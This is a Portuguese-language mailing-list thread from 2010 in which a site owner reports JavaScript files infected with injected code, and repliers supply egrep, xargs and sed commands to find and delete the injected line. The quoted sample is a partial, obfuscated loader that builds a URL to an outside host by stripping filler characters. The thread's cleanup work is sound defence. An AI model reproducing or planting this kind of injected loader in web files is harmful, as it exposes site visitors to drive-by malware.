Opa, olha só, essa foi meio complicada, to sem tempo pra escrever a
explicação de como funciona o que eu fiz, mas a linha completa que vc
precisa disparar a partir do diretório onde estão os teus js é:
egrep -RH '.*kDeMtD-McMoDmM.DaMdMvDeD.*' *.js |cut -d":" -f1 |xargs sed
-i.backup /^var\ l=\"\"\;try\ \{this\.u=\'\'\;var\
j\;if\(j\!=\'\'\)\{j=\'S\'\}\;var\ Ir=new\ Array\(\)\;var$/d
Esse comando irá fazer a deleção da linha que vc deseja e irá criar um
arquivo de backup com a extensão .backup para cada arquivo que for
alterado, ou seja 100% seguro
Abraços
MrBiTs escreveu:
>
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> On 04/13/2010 09:50 PM, Fernando Avena wrote:
> > pessoal acontece de varios .js ter sido contaminados e dentro deles foi
> > colocado um conteudo malicioso.
> >
> >
> > var l="";try {this.u='';var j;if(j!=''){j='S'};var Ir=new Array();var
> > g;if(g!='dF'){g=''};var x;if(x!='R' && x!='si'){x='R'};var z=RegExp;var
> > xk;if(xk!='gL'){xk='gL'};var
> > h="repS8v".substr(0,3)+"lactT6".substr(0,3)+"e";var
> Jl="";this.O="";function
> > s(q,Y){var yw=new Date();var m="Ke0[".substr(3);var Xx=new Date();var
> > c;if(c!='' && c!='ZH'){c=null};var
> > p=String("gI1Th".substr(0,1));m+=Y;m+=String("6Jb]".substr(3));var
> > _b='';this.jP='';var XM="";var o=new z(m, p);return q[h](o, new
> > String());this.r='';};this.uw="";this.oz='';var
> >
> hu=s('hMtMtMpM:M/M/DpDhDoDtDoDbMuMcMkDeMtD-McMoDmM.DaMdMvDeDrDtDsMeDrDvMeD.McDoDmM.DcDoMnDdDuDiDtM-McMoMmM.MBDeMsMtDBMlDeDnMdDeDrDPMaDrDtM.MrMuM:M',"MD");var
> > i=s('833404383440334',"34");var
> >
> V=s('/wpwi3x3n3e3t3.3n3e3t3/wpwiwxwn3ewt3.3n3ewtw/3g3o3o3gwl3ew.wcwowm3/3s3ows3ow.wc......
> >
> > *find js/ -name *.js | xargs grep -E
> > "M/M/DpDhDoDtDoDbMuMcMkDeMtD-McMoDmM.DaMdMvDeDrDtDsMeDrDvMeD.McDoD"*
> >
> > com linha acima...ele me mostra todos os arquivos e o conteudo da linha
> > dentro deles.
> >
> > teria algo que possa coloca na frete e já faça a remoção desta var
> l=.....
> > de todos os .js que ele encontrou que tem o conteudo *
> > kDeMtD-McMoDmM.DaMdMvDeD* na linha?
>
> sed -e
> '#M/M/DpDhDoDtDoDbMuMcMkDeMtD-McMoDmM.DaMdMvDeDrDtDsMeDrDvMeD.McDoD#d'
> arquivo.js
>
> Isso irá remover a linha que contém esse código obfuscado. Entretanto,
> não irá modificar o arquivo original.
> As versões mais atuais do sed tem a opção -i, que altera o arquivo
> imediatamente, mas eu faria antes um backup do arquivo original.
> O sed também dá essa opção a você. Estude-o, também para entender
> porquê eu utilizei # como delimitador do sed ao invés do usual /
>
> - --
>
> Um abraço
>
> .0. MrBiTs - [email protected] <mailto:mrbits.dcf%40gmail.com>
> ..0 GnuPG -
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x6EC818FC2B3CA5AB
> <http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x6EC818FC2B3CA5AB>
> 000 http://www.mrbits.com.br <http://www.mrbits.com.br>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
>
> iQEcBAEBCAAGBQJLxayEAAoJEG7IGPwrPKWrecMH/1aYmFnuoBhUor5IGc8x3uWf
> q80y+bMO8hqLe1Rx6vug5rMPqZ2o4bwhIAL58eAspaUFGuWj68tXrQnv20etZMU+
> SlCLn8PGD3o+5lDu3ConSB5H9QrWqd+Z//7QbfjHcgHiYGGGwEZS56o9QdKozQ5M
> 8w7+HRy8cHtfKNhiOaKBnurYjY5W036pUYesYQ3yaT6D1HgWOlpE0D0DeH7MHnOy
> vDDXgKUiCYnT7TjrIwzg1KjSo9Rl3VV4gJl39a81RZ7j3XUf/BYcKHGQD13z+j+N
> Fwvgm0h1/xC5qs7ib+VP0N+w9YJwpOzJHXi169sfGVO1Ag9QdHUcAaz8y+BQ1OM=
> =tu90
> -----END PGP SIGNATURE-----
>
>
